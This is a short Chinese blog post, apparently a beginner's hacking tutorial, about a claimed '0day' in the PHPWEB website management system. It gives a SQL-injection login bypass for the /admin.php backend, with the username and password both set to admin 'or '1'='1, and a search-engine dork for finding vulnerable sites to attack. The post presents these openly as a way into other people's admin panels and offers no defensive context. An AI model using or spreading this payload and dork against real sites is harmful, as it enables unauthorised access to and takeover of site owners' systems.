phpweb管理系统0day漏洞,扫描

2019年11月5日20:24:05 发表评论

HPWEB成品网站,版面较好,看起来比较大气,而且支持可视化操作及拖拽,得到越来越多的企业及网络公司青睐。
但是程序本身存在一个致命的漏洞,可以通过SQL注入的方式轻松进入管理员控制后台。
比如网站的域名是xxxx.com,那么后台登陆地址应该是xxxx.com/admin.php,如下图:

phpweb管理系统0day漏洞,扫描

万能账号:admin 'or '1'='1

万能密码:admin 'or '1'='1

这样的话就能进入管理系统了。

后台扫描:inurl:news/html/?411.html

phpweb管理系统0day漏洞,扫描

phpweb管理系统0day漏洞,扫描

 

此课程只正对小白的课程!

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: